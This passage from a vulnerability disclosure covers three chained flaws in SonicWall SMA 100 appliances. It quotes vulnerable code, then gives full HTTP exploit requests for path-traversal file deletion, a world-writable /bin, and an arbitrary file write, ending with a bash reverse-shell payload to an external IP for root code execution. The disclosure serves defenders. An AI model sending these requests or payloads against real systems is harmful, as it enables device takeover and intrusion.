0001b31e        if (!sessionHandle)
0001b37b            return -1;
0001b37b        
0001b320        char* methodPointer = method;
0001b324        int32_t compareChars = 5;
0001b329        char const* const compareStr = "POST";
0001b329        
0001b32f        while (compareChars)
0001b32f        {
0001b32f            char mChar = *(uint8_t*)methodPointer;
0001b32f            char const compareChar = *(uint8_t*)compareStr;
0001b32f            match = mChar == compareChar;
0001b32f            methodPointer = &methodPointer[1];
0001b32f            compareStr = &compareStr[1];
0001b32f            compareChars -= 1;
0001b32f            
0001b32f            if (mChar != compareChar)
0001b32f                break;
0001b32f        }
0001b32f        
0001b331        if (match)
0001b331        {
0001b35f            currentSessionId = swcctn;
0001b35f            
0001b36a            if (doCSRFCheckForCgi(sessionHandle, currentSessionId))
0001b36a            {
0001b36f                sessionFree(sessionHandle);
0001b374                return -2;
0001b36a            }
0001b331        }
0001b331        
0001b336        sessionFree(sessionHandle, currentSessionId);
0001b33b        return 0; // [E]
0001b2e0    }
</pre><p>That establishes that any low-privileged user can call RacNumber functions via the sonicfiles API. In 2021, <a href="https://www.nccgroup.com/us/research-blog/technical-advisory-sonicwall-sma-100-series-unauthenticated-arbitrary-file-deletion/">NCC Group outlined</a> how the RAC_DOWNLOAD_TAR function (RacNumber=44) could be exploited with a path traversal for privileged arbitrary file deletion. That download_tar code does not appear to have been modified from what the NCC Group blog post shows, since the “/tmp” directory string is still unsafely concatenated with tainted web parameters ([F]); only the authentication check outlined above in main_handler appears to have been implemented as a fix.</p><pre>  def download_tar(self, partialCmd):
        arg1 = self.get_decoded_url('Arg1')
        foldername = request.args.get('Arg2')
        timestamp = request.args.get('timestamp')
        list_file_path = None
            
        cmd_list = partialCmd.split()
        cmd_list.append(arg1)
        cmd_list.append(foldername)
        cmd_list.append("stdout")
        #appending verbose

        logger.debug("{} download_tar:: cmd_list: {}, timestamp {}".format(SONICFILES, cmd_list, timestamp))

        if timestamp is not None:
            swcctn = request.args.get('swcctn')
            list_file_path = '/tmp/' + swcctn + '_' + timestamp # [F]
            cmd_list.append(list_file_path)

        self.get_cred(cmd_list,arg1)#Appends cred to the list
        current_time = datetime.datetime.now().time()
        logger.debug("{} Download Start time : {}".format(SONICFILES, current_time.isoformat()))
		
        cmd_bytes_list = str_list_to_uft8_bytes_list(cmd_list)
        downloadsubprocess = subprocess.Popen(cmd_bytes_list,stdout=subprocess.PIPE,shell=False)
[..SNIP..]
</pre><h4>Exploitation</h4><p>We’ll start by creating a user named lowpriv with low user-level SMA privileges. This user account should not have access to any administrative functionality, and it will act as our victim account for exploitation. We’ll login to the SMA web service listening on port 443 and establish that we have access to this standard user account.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf013641e653f8216/68497cebb037915ebe2b618b/blog-sonicwall-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-2.png" asset-alt="blog-sonicwall-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf013641e653f8216/68497cebb037915ebe2b618b/blog-sonicwall-2.png" data-sys-asset-uid="bltf013641e653f8216" data-sys-asset-filename="blog-sonicwall-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-2.png" sys-style-type="display"/></p><p>We’ll create two attacker-owned files as root to demonstrate the privileged arbitrary file delete.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda5a36aa53bab557/68497d0ab03791317c2b618f/blog-sonicwall-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-3.png" asset-alt="blog-sonicwall-3.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda5a36aa53bab557/68497d0ab03791317c2b618f/blog-sonicwall-3.png" data-sys-asset-uid="bltda5a36aa53bab557" data-sys-asset-filename="blog-sonicwall-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-3.png" sys-style-type="display"/></p><p>Next, we’ll grab our lowpriv user’s session cookies and use them to perform the malicious file delete web request. The server will return a generic 500 code error response.</p><pre>GET /fileshare/sonicfiles/?User=admin&Pass=null&Domn=&RacNumber=44&Arg1=smb://192.168.200.1/test/&Arg2=null&swcctn=../usr/src/EasyAccess/www/python/authentication&timestamp=api/../../../../../../tmp/rootfile HTTP/1.1
Host: 192.168.181.150
Cookie: swap="MHo5dTZvQkNRcXhVWDVpMFo1MktCRGZmYkZjSE9CZm1FUU9QOWdUek5BZz0="; swcctn=JKUKl0KiKYX5Kf4nY7700B4lb5N7M1PD
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
</pre><p>With our console root shell, we can see that the root-owned /tmp/rootfile file has been deleted.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcfbf1b6b5fc46cf6/68497d89af183099d1e6ed2b/blog-sonicwall-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-4.png" asset-alt="blog-sonicwall-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcfbf1b6b5fc46cf6/68497d89af183099d1e6ed2b/blog-sonicwall-4.png" data-sys-asset-uid="bltcfbf1b6b5fc46cf6" data-sys-asset-filename="blog-sonicwall-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-4.png" sys-style-type="display"/></p><p>This can be leveraged to delete the /etc/EasyAccess/var/conf/persist.db file, which is the primary web server SQLite database. When that happens, the system will reboot and reset the SMA administrator password to “password”. Based on known (private) IOCs and Rapid7 incident response investigations, we believe that this specific technique may have been used in the wild.</p><h3>CVE-2025-32820</h3><p>An authenticated attacker with user-level low privileges can inject a path traversal sequence to an arbitrary directory on the SMA appliance to make it world-writable. This can be chained with CVE-2025-32819 and CVE-2025-32821 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. Additionally, if a file path is provided, any existing file on the system can be overwritten with junk contents as root, creating a persistent denial of service condition.</p><p>Let’s investigate this now. In authentication_api/client/__init__.py, we observe authentication checks implemented in before_request ([G]).</p><pre>@application.before_request
def before_request():
    logLevl = Logger.getLogLevel()
    application.logger.setLevel(logLevl)
    current_app.logger.info("{} {}".format(request.method, request.script_root + request.path))
    Authorize.authorization_check(request, current_app.logger, False) # [G]
</pre><p>This authorization_check function is similar to the one we previously looked at. However, this function is implemented in Python, within smaauthorize.py, instead of in a C shared library. Below, we can see this logic. The third parameter is called requireAdmin, and it defaults to True ([H]). In this case, though, the call within before_request explicitly states that low-privilege users should be allowed via the False parameter input. The authorization code queries the primary web SQLite database to determine whether the user’s swap session cookie exists in the database ([I]). If so, the request will succeed.</p><pre>  @staticmethod
    def authorization_check(request, logger, requireAdmin = True): # [H]
        if (API_UNIT_TEST_MODE):
            return

        sessionId = request.cookies.get(AP_COOKIE_NAME)

        if (sessionId == None):
            logger.info("Login failed. No valid sessionId from cookie.")
            raise Unauthorized(AUTHORIZE_FAIL)

        temp_db_session = Session()
        sessionId_decoded = base64.b64decode(sessionId).decode()
        sslvpn_session = temp_db_session.query(SmaSession).filter(SmaSession.sessionId == sessionId_decoded).first() # [I]
        if (sslvpn_session == None):
            temp_db_session.close()
            logger.info("Login failed. No valid session. sessionId = {}, sessionId_decoded = {}".format(sessionId, sessionId_decoded))
            raise Unauthorized(AUTHORIZE_FAIL)

        # touch session
        sslvpn_session.activityTimestamp = int(time.time())
        temp_db_session.commit()
        temp_db_session.refresh(sslvpn_session)
        temp_db_session.close()

        # authorization check
        Authorize.sessionStatusCheck(logger, sslvpn_session)
        Authorize.userTypeCheck(logger, requireAdmin, sslvpn_session)
        Authorize.CSRFTokenCheck(logger, requireAdmin, sslvpn_session)
</pre><p>There are a few different API endpoints that can be reached as our low-privilege user. That list is depicted below:</p><pre>clientApi.add_resource(NxDisconnectInfoResource, '/nxdisconnectinformation')
clientApi.add_resource(NxPostConnectionScriptResource, '/nxpostconnectionscript')
clientApi.add_resource(NxPostConnectionScriptFileResource, '/nxpostconnectionscript/file')
clientApi.add_resource(NxVersionResource, '/nxversion')
clientApi.add_resource(VpnParametersResource, '/vpnparameters')
clientApi.add_resource(SessionStatusResource, '/sessionstatus')
clientApi.add_resource(AlwaysOnResource, '/alwayson')
clientApi.add_resource(RecurringEpcProfileResource, '/recurringepcprofile')
clientApi.add_resource(BookmarkDetailListResource, '/bookmarkdetails')
clientApi.add_resource(ConnectionProxyResource, '/connectionproxy')
clientApi.add_resource(AdLogonScriptResource, '/adlogonscript')
</pre><p>The NxPostConnectionScriptFileResource endpoint sounds promising, since it deals with file operations. Within nxpostconnectionscript.py, we find the API endpoint logic for POST requests. A file input parameter called upfile is expected ([J]). A sanitized file name is extracted using <a href="https://tedboy.github.io/flask/generated/werkzeug.secure_filename.html">secure_filename</a> (to prevent path traversal) and assigned to the tmp_file variable ([K]). Then, the file contents are stored in tmp_file’s location. A file operation command is also executed using os.system, with the tmp_file argument sanitized using <a href="https://docs.python.org/3/library/shlex.html#shlex.quote">shlex.quote</a> to prevent command injection ([L]).</p><p>This is all handled well. However, while the tmp_file path was created safely, the application later needs to reference just the file name without the prepended /tmp directory. In order to do so, it defines a new filePath variable by directly concatenating the unsanitized file.filename string with a different directory path ([M]). This is then wrapped in shlex.quote, appended to the string “chmod 777 ”, and executed using os.system ([N]). No command injection is possible, since the command string is appropriately escaped. Despite this, shlex.quote does not remove path traversal sequences, so a relative traversal file name can be supplied by the attacker to execute “chmod 777” as root on any path of the attacker’s choosing.</p><pre>   @swagger.doc(postDocument)
    def post(self):
        post_reqparser = reqparse.RequestParser()
        post_reqparser.add_argument('upfile', required = True, type = FileStorage, location = 'files') # [J]
        args = post_reqparser.parse_args()

        [..SNIP..]

        # store file in /tmp for examination
        file = request.files['upfile']
        tmp_file = '/tmp/' + secure_filename(file.filename) # [K]
        file.save(tmp_file)

        fileSize = os.stat(tmp_file).st_size
        if (fileSize &gt; smaApi.MAX_SCRIPT_FILE_LEN or fileSize == 0):
            cmd = "rm -rf {}".format(shlex.quote(tmp_file)) # [L]
            os.system(cmd)
            raise BadRequest(getMessage(API_ERR_CODE_CLIENT_FILE_SIZE_INVALID).format(int(smaApi.MAX_SCRIPT_FILE_LEN / 1024)))

        # check dir exists or not and if not create it
        if (not os.path.exists(smaApi.POST_SCRIPTS_DIR)):
            cmd = "mkdir {}; chmod 777 {}".format(shlex.quote(smaApi.POST_SCRIPTS_DIR), shlex.quote(smaApi.POST_SCRIPTS_DIR))
            os.system(cmd)
        
        if (not os.path.exists(smaApi.POST_SCRIPTS_DESC_DIR)):
            cmd = "mkdir {}; chmod 777 {}".format(shlex.quote(smaApi.POST_SCRIPTS_DESC_DIR), shlex.quote(smaApi.POST_SCRIPTS_DESC_DIR))
            os.system(cmd)

        # move file to its destination
        cmd = "mv {} {}".format(shlex.quote(tmp_file), shlex.quote(smaApi.POST_SCRIPTS_DIR))
        os.system(cmd)
        filePath = smaApi.POST_SCRIPTS_DIR + '/' + file.filename # [M]
        cmd = "chmod 777 {}".format(shlex.quote(filePath)) # [N]
        os.system(cmd)
[..SNIP..]
</pre><h4>Exploitation</h4><p>This is a niche primitive, since we do not control the command being executed. Fortunately, making any directory world-writable is exactly what we need to weaponize CVE-2025-32821, our arbitrary low-privilege file write as nobody. We’ll perform a web request to the vulnerable API endpoint as the lowpriv user. In that request, we’ll set upfile to a relative traversal sequence into /bin, which is on the root user’s PATH.</p><pre>POST /__api__/v1/client/nxpostconnectionscript/file HTTP/1.1
Host: 192.168.181.150
Cookie: swap="MUZTMTExT29UVW1UZ0p2aURTQThWYzlLTmV3TEp3dGR5a0FzR3h6aEY2RT0="; swcctn=kg02nQOWI0JEdgI9OyK4i2EJyvP0Zfy0
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIpPybfdplJ1hIwzq
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 213

------WebKitFormBoundaryIpPybfdplJ1hIwzq
Content-Disposition: form-data; name="upfile"; filename="../../../../../../../../../bin/"

01
------WebKitFormBoundaryIpPybfdplJ1hIwzq--
</pre><p>Our pspy monitor logs two commands being executed as root. The first command’s file path is sanitized using secure_filename, but the second is only sanitized using shlex.quote, resulting in a traversal to /bin.</p><pre>CMD: UID=0     PID=15082  | sh -c mv /tmp/bin /usr/src/EasyAccess/var/conf/postscripts
CMD: UID=0     PID=15083  | sh -c chmod 777 /usr/src/EasyAccess/var/conf/postscripts/../../../../../../../../../bin/
</pre><p>Exploitation is confirmed with our console root shell, which shows that the /bin directory is now world-writable.</p><h3><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc8c48d3ccb590f5c/68497de045f69a3c399397d4/blog-sonicwall-5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-5.png" asset-alt="blog-sonicwall-5.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc8c48d3ccb590f5c/68497de045f69a3c399397d4/blog-sonicwall-5.png" data-sys-asset-uid="bltc8c48d3ccb590f5c" data-sys-asset-filename="blog-sonicwall-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-5.png" sys-style-type="display"/></h3><h3>CVE-2025-32821</h3><p>An authenticated attacker with administrator privileges can inject shell command arguments with an escape sequence to upload a fully controlled file anywhere that the nobody user can write to. This can be chained with CVE-2025-32820 to establish root-level remote code execution on the SMA research target running 10.2.1.14-75sv. It’s also possible to copy existing files that the nobody user can read, such as /etc/passwd or the application’s SQLite database, to the web root directory for data exfiltration.</p><p>We’ll start by taking a look at the main function in /cgi-bin/importlogo.</p><p>After confirming the user is an authenticated administrator and the HTTP method is “POST”, the application checks for the presence of an integer parameter called updateFavicon ([O]). If this is set to “1”, and if the defaultFavicon parameter is “0”, the application will call FUN_0804a0f0 with the first argument set to a FILE pointer from the multipart form file parameter called favicon1 ([P]). After confirming some basic validation checks, such as file size, the FUN_0804a0f0 function will write the uploaded file to disk at /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico. Next, the portalName POST parameter is fetched and passed through safeSystemCmdArg2 ([Q]). This is a security function that searches for command injection characters, such as $, \n, ;, |, &lt;, &gt;, ^, and `. If any of those characters are detected, the function will return a truncated string of the characters up to that point. Then, a format string is created with the sanitized portalName value to craft the shell command string cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/{portalName_VALUE}/favicon.ico ([R]) and the command is executed via system_s_quiet ([S]), which is a wrapper for system that runs in the context of nobody.</p><pre>[..SNIP..]
  if (initCgi() &lt; 0) {
    return -1;
  }

  getCookie("swap",cookieBuffer);

  initClientApi();
  cspInit();

  reqMethod = (char *)gcgiFetchEnvVar(4);
  uVar9 = dbhGet(0);

  sessionHandle = sessionGetAndRefresh(uVar9,cookieBuffer);

  if (sessionHandle == 0) {
    gcgiSendStatus(401);
    return 0;
  }
  respJson = cJSON_CreateObject();
  messageJsonArray = cJSON_CreateArray();

  if ((respJson == 0) || (messageJsonArray = 0)) {
    return 0;
  }

  maybeResult = userRolePermissionCheck(sessionHandle,reqMethod);
  if (maybeResult == 1) {
    pcVar5 = "You have no permission to view this page";

LAB_0804948a:
    addWarningMessage(messageJsonArray,"error",pcVar5);
  }
  else {
    if (maybeResult == 2) {
      pcVar5 = "Read-only administrator";
      goto LAB_0804948a;
    }

    if (maybeResult == 0) {
      maybeResult = strcmp(reqMethod,"POST");

      if (maybeResult != 0) goto LAB_080493e8;

      if (doCSRFTokenCheck(sessionHandle) != 1) {
        exit(-1);
      }

      setuid(0);
      setgid(0);
      seteuid(0);
      setegid(0);
      
      gcgiFetchInteger("updateFavicon",&updateFaviconFlag,0);
      
      if (updateFaviconFlag == 1) { // [O]
        maybeResult = gcgiFetchInteger("defaultFavicon",&useDefaultFavicon,0);
        bVar1 = nullptr;

        if (useDefaultFavicon == 0) {
          maybeResult = FUN_0804a0f0("favicon1","favicon1.ico",maybeResult); // [P]
          bVar1 = 0 &lt; maybeResult;
        }

        maybeResult = gcgiFetchString("portalName",portalNameBuffer,0x80);

        if (maybeResult == 0) {
          if (useDefaultFavicon == 0) { 
            if (bVar1) {
              uVar9 = safeSystemCmdArg2(portalNameBuffer,"-"); // [Q]
              baseInstallDir = "/usr/src/EasyAccess";
              __snprintf_chk(pcVar5,0x180,1,0x180,
                             "cp -f %s/www/htdocs/themes/favicon1.ico %s/uiaddon/%s/favicon.ico",
                           "/usr/src/EasyAccess","/usr/src/EasyAccess",uVar9,"/usr/src/EasyAccess"
                            ); // [R]
              system_s_quiet(pcVar5); // [S]
[..SNIP..]
</pre><p>Note that the provided portal name is not validated as a legitimate web portal name at any point in the code path thus far–it’s checked against valid portal names if updateFavicon is not set. So, we don’t need to provide a valid portal name. Additionally, although the portal name is sanitized for command injection characters, it is not sanitized for path traversals, it is not URL encoded, and hash symbols are not truncated. As a result, an attacker can provide a portalName value with a traversal sequence to a different file path, followed by a space and a hash symbol to escape “/favicon.ico”.</p><p>The result is that the attacker can upload their own fully controlled file and exploit the limited command injection to write it with any file name they’d like to any directory that nobody can write to.</p><h4>Exploitation</h4><p>We can perform the web request depicted below to exploit this arbitrary file write.</p><pre>POST /cgi-bin/importlogo HTTP/1.1
Host: 192.168.181.150
Cookie: ajaxUpdates=OFF; swap="NVlSSVc1MVdtb0syYWFybFdUdHFEcG9hRjZpMWlyaThlY0FmdlNQRlRhOD0="; swcctn=aXJANYBXJMy46YLSIApSwSoRIWkYRkR5
Content-Length: 554
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: aXJANYBXJMy46YLSIApSwSoRIWkYRkR5
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXOj6BtGNhEubdWvN
Origin: https://192.168.181.152
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.181.152/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="portalName"

../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="defaultFavicon"

0
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="updateFavicon"

1
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="favicon1"; filename="TESTING.gif"
Content-Type: image/gif

CONTENT
------WebKitFormBoundaryXOj6BtGNhEubdWvN--
</pre><p>Our pspy monitor logs the following command being executed as UID 99 (nobody).</p><pre>2025/05/01 12:10:47 CMD: UID=99    PID=3243   | sh -c cp -f /usr/src/EasyAccess/www/htdocs/themes/favicon1.ico /usr/src/EasyAccess/uiaddon/../../../../../../usr/src/EasyAccess/www/htdocs/test.txt #/favicon.ico 2&gt;/dev/null
</pre><p>As expected, the test.txt file has been written to the web root.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2b9f2c209b7e280f/68497e4f2fcbad401c66429f/blog-sonicwall.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall.png" asset-alt="blog-sonicwall.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2b9f2c209b7e280f/68497e4f2fcbad401c66429f/blog-sonicwall.png" data-sys-asset-uid="blt2b9f2c209b7e280f" data-sys-asset-filename="blog-sonicwall.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall.png" sys-style-type="display"/></p><p>We also note that the uploaded file has the executable bit set by default.</p><pre># ls -lha /usr/src/EasyAccess/www/htdocs/test.txt
-rwx------ 1 nobody nobody 7 May  1 12:10 /usr/src/EasyAccess/www/htdocs/test.txt
</pre><p>This detail is useful for exploitation, since it will facilitate easily writing an executable file to a directory on the root PATH for arbitrary remote code execution.</p><h3>Chained Impact</h3><p>The vulnerabilities disclosed in this document permit an attacker with SMA SSLVPN low-privilege user credentials to perform the following five steps:</p><ol><li>Exploit CVE-2025-32819 to delete the primary SQLite database and reset the password of the default SMA admin user.</li><li>Login as admin to the SMA web interface.</li><li>Exploit CVE-2025-32820 to make the SMA appliance’s /bin directory world-writable.</li><li>Exploit CVE-2025-32821 to write the file /bin/lsb_release. This executable is not installed by default, but we observed that an automated job on the appliance routinely attempts to execute it as root every few minutes.</li><li>Wait for sh -c lsb_release to be executed automatically. When this happens, the attacker gains root-level remote code execution on the SMA device.</li></ol><h4>Demonstration</h4><p>We’ll start by grabbing our low-privilege user’s cookies in our “assumed breach” scenario. This cookie string is swap="ZHNZZThVdlJzWHY1MkpWTDM0akFjbG9XWFgyd29Hdk1yVEtPZWdzSnJlbz0="; swcctn=LEj9kOzEjYibGOSEW9YE8ElgWwiOgigN.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80e7a41e6852c46b/68497e7176d3246a8a38a4fd/blog-sonicwall-8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-8.png" asset-alt="blog-sonicwall-8.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt80e7a41e6852c46b/68497e7176d3246a8a38a4fd/blog-sonicwall-8.png" data-sys-asset-uid="blt80e7a41e6852c46b" data-sys-asset-filename="blog-sonicwall-8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-8.png" sys-style-type="display"/></p><p>Now, let’s reset the administrator’s password by exploiting CVE-2025-32819 and deleting the primary SQLite database. The SMA returns a 200 status with no body.</p><pre>GET /fileshare/sonicfiles/?User=admin&Pass=null&Domn=&RacNumber=44&Arg1=smb://192.168.200.1/test/&Arg2=null&swcctn=../usr/src/EasyAccess/www/python/authentication&timestamp=api/../../../../../../usr/src/EasyAccess/var/conf/persist.db HTTP/1.1
Host: 192.168.181.150
Cookie: swap="ZHNZZThVdlJzWHY1MkpWTDM0akFjbG9XWFgyd29Hdk1yVEtPZWdzSnJlbz0="; swcctn=LEj9kOzEjYibGOSEW9YE8ElgWwiOgigN
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
</pre><p>Refreshing the web page confirms it worked, though the application is not thrilled with our decision.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltecbbf9920a3aaf3a/68497ee62fcbad1ef86642b3/blog-sonicwall-9.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-9.png" asset-alt="blog-sonicwall-9.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltecbbf9920a3aaf3a/68497ee62fcbad1ef86642b3/blog-sonicwall-9.png" data-sys-asset-uid="bltecbbf9920a3aaf3a" data-sys-asset-filename="blog-sonicwall-9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-9.png" sys-style-type="display"/></p><p>After a few seconds, the watchdog has had enough and the device is rebooted. When we refresh the page a couple of minutes later, things are looking as good as new.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebbb3ccbe5ad0cc4/68497f06209a6a4497fcf79b/blog-sonicwall-10.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-10.png" asset-alt="blog-sonicwall-10.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltebbb3ccbe5ad0cc4/68497f06209a6a4497fcf79b/blog-sonicwall-10.png" data-sys-asset-uid="bltebbb3ccbe5ad0cc4" data-sys-asset-filename="blog-sonicwall-10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-10.png" sys-style-type="display"/></p><p>After logging in using the credentials admin:password, we’re greeted with an end user product agreement, indicating that the device has been initialized.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt137968ae793ae788/68497f24498eb085f0acd5ad/blog-sonicwall-11.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-11.png" asset-alt="blog-sonicwall-11.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt137968ae793ae788/68497f24498eb085f0acd5ad/blog-sonicwall-11.png" data-sys-asset-uid="blt137968ae793ae788" data-sys-asset-filename="blog-sonicwall-11.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-11.png" sys-style-type="display"/></p><p>We’ll input a free trial license key to get the device back in a functional state, though a real attacker would probably use a stolen one. Next, we’ll use our CVE-2025-32820 PoC to make /bin writable. The server should return a 500 error with the message “Failed to create description file.”</p><pre>POST /__api__/v1/client/nxpostconnectionscript/file HTTP/1.1
Host: 192.168.181.150
Cookie: swap="amZEMjA1cVYwNXRzWDFmcDgzcVhEb3NNM2hFMHE4a0FTOFZTQTlDeE1kaz0="; swcctn=bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIpPybfdplJ1hIwzq
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Length: 181

------WebKitFormBoundaryIpPybfdplJ1hIwzq
Content-Disposition: form-data; name="upfile"; filename="../../../../../../../../../bin/"

01
------WebKitFormBoundaryIpPybfdplJ1hIwzq--
</pre><p>Lastly, we’ll set our sights on remote code execution as root by exploiting CVE-2025-32821. We throw the reverse shell PoC below at our victim and it responds with a 200 code and “success” in the body. Note that a hash symbol is also appended to our executable file contents; this is added because the file write occasionally seems to append a junk character to our command, though it doesn’t happen every time. In order to avoid any unexpected additions, we escape the rest of the line.</p><pre>POST /cgi-bin/importlogo HTTP/1.1
Host: 192.168.181.150
Cookie: swap="amZEMjA1cVYwNXRzWDFmcDgzcVhEb3NNM2hFMHE4a0FTOFZTQTlDeE1kaz0="; swcctn=bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Content-Length: 567
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: bGhJ8EJ9GMmKG7d3MggEEgd8R59gyFSv
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXOj6BtGNhEubdWvN
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="portalName"

../../../../../../bin/lsb_release #
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="defaultFavicon"

0
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="updateFavicon"

1
------WebKitFormBoundaryXOj6BtGNhEubdWvN
Content-Disposition: form-data; name="favicon1"; filename="TESTING.gif"
Content-Type: image/gif

bash -i &gt;& /dev/tcp/192.168.181.129/4242 0&gt;&1 #
